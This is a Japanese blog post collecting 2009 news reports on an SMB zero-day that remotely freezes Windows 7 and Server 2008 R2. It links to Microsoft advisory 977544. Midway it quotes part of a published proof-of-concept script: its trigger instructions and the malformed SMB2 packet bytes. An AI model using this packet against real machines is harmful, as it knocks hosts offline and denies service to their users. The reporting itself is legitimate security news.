SMBなZero-Dayな脆弱性をついたExploitが出ているそうです！

SANS Internet Storm Centerは11月12日、MicrosoftのSMB（Server Message Block）のゼロデイの脆弱性を突いたとするエクスプロイトコードが見つかったと伝えた。脆弱性は、Windows 7とWindows Server 2008にも影響することを確認したとしている。
問題のエクスプロイトコードはWebサイトで公開されており、SANSで試験的に実行したところ、Windowsホストがフリーズしてマウスやキーボードが使えなくなり、ネットワーク上でもまったく反応がなくなった。最新のパッチを当てたWindows 7とWindows Server 2008でも同じだったという。

MicrosoftのSMBに新たな脆弱性？ 最新OSに影響 - ITmedia エンタープライズ

SANS経由らしいです。

http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html
you want to give kudos to this sort of guy?
****
November 8th, 2009: MSRC contacted
November 8th, 2009: MSRC acknoledge the vuln
November 11th, 2009: MRSC try to convince me that multi-vendor-ipv6 bug shouldn't appears on a security bulletin.
November 11th, 2009: Win 7 remote kernel smash released

InfoSec Handlers Diary Blog - Windows 7 / Windows Server 2008 R2 Remote SMB Exploit

これか・・・

IV. PROOF OF CONCEPT
-------------------------
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffie
#
import SocketServer
packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"

Laurent Gaffié blog: Windows 7 / Server 2008R2 Remote Kernel Crash

Microsoftは米国時間11月11日、「Windows 7」および「Windows Server 2008 Release 2」の脆弱性に関する報告を調査中であることを発表した。この脆弱性を利用することで攻撃者は、コンピュータをクラッシュさせることがリモートから可能になるという。
Microsoft広報担当者によると、同社は「Windows Server Message Block（SMB）に存在する、サービス拒否（DoS）を発生する可能性がある脆弱性についての申し立てを調査中」だという。ただし、同広報担当者によると、Microsoftでは、この脆弱性を悪用した攻撃は確認していないという。

MS、「Windows 7」および「Windows Server 2008 Release 2」の脆弱性報告を調査 - CNET Japan

関連URL

• MicrosoftのSMBに新たな脆弱性？　最新OSに影響 - ITmedia エンタープライズ
• New SMB Zero-Day Exploit? | Malware Blog | Trend Micro
• 最新OSに影響するDoSの脆弱性、Microsoftが確認 - ITmedia エンタープライズ
• Calendar of Updates: Windows, Security Updates and Software Help
• Microsoft Security Advisory (977544): Vulnerability in SMB Could Allow Denial of Service
• マイクロソフト セキュリティ アドバイザリ (977544): SMB の脆弱性により、サービス拒否が起こる
• Calendar of Updates: Windows, Security Updates and Software Help
• Windows 7とServer 2008 R2に新たな脆弱性、攻撃プログラムが出現：ニュース
• US-CERT Current Activity
• SMB脆弱性のマイクロソフトセキュリティアドバイザリを確認する -INTERNET Watch